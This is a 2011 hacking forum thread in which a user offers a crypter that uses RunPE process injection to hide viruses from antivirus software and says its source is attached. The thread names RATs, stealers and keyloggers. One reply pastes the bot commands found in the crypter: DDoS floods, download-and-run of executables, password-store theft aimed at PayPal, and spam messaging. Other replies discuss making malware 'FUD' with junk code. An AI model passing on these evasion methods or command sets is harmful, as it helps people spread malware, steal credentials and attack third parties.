
Crypter overview


5 replies to this topic

#1 cipher

    RE Is My Profession !!!

  • (Full Member)
  • 69 posts
  • Gender:Male
  • Location:In Encrypted Text
  • Interests:RE,Hacking............

Posted 05 January 2011 - 06:37 PM

Hello,

I am here today with an executable that can obfuscate a virus and make it fully undetectable by anti-viruses. This executable uses the RunPE technique to inject into another process and dump the crypted code into memory, and hence the executable's code remains undetected by anti-viruses.

These crypters are programmed by individuals and hence remain undetected most of the time. Mostly they are coded in VB or .NET, and hence you will find most of the viruses showing VB attributes during PE scans, but mostly the viruses/RATs/stealers/bots/worms are coded in Borland Delphi.

Examples:
1) RATs       : CyberGate, Blackshades, Pixel, SpyNet, DarkComet etc.
2) Stealers   : iStealer v6.0 (latest), Albertino, Maya password stealer etc.
3) Keyloggers : Albertino, Rapzo, Irtech etc.
4) Crypters   : iCrypt, Galaxy, Blackout AIO, Demon, CypherX (www.crypters.net) etc.


The sample crypter source code is attached here.



#2 MetroidzZ

    Newbie

  • (Junior)
  • 1 posts

Posted 29 March 2011 - 09:10 PM

thanks :)

#3 ksanket

    Member

  • (Full Member)
  • 73 posts
  • Gender:Male

Posted 30 March 2011 - 02:47 AM

http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801


http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813

I think the code below must not be present in a crypter project; this makes it behave like a bot:

hello [login]
.bai [logout]
.removeAll [removes ALL bots]

DDoS CMDs

./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful might destroy bots

Download/Update

./download (http://site.com/file.exe C:\file.exe 1)
./update (????)

MSC
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)


#4 xXb3b3Xxl

    Newbie

  • (Junior)
  • 1 posts

Posted 31 May 2011 - 05:34 PM

Check it...

#5 Blue Indian

    Team IREC

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:Some where in India
  • Interests:****ing protected exe , cracking and coding

Posted 01 June 2011 - 10:07 PM

@Cipher: Thanks mate, but these are old goodies; I played with them when I was learning CEH. These goodies are no more; for example, in our team ICA we don't use them like this.
Try the self-mod version of Fly Crypter.
And also a nice collection of RAT names.

@ksanket: These codes are not used to make it behave like a bot; these codes are part of a Trojan or stealer.
"If there is one place on the earth where all the dreams of living men have found a home from the very earliest days, when men began to dream of existence, it is INDIA"
--Romain Rolland
Contact http://www.teamirec.com http://teamirec.forumotion.in http://twitter.com/teamirec and http://www.teamirec.co.in

#6 cipher

    RE Is My Profession !!!

  • (Full Member)
  • 69 posts
  • Gender:Male
  • Location:In Encrypted Text
  • Interests:RE,Hacking............

Posted 22 July 2011 - 10:26 AM

@Blue Indian: I guess you are talking about a polymorphic engine, but still 99% of the crypters on the market use the same PE injection technique.

I don't know much about polymorphic engines, though; still, they manage to make it FUD by adding junk code, by changing the variable names and by some advanced techniques.



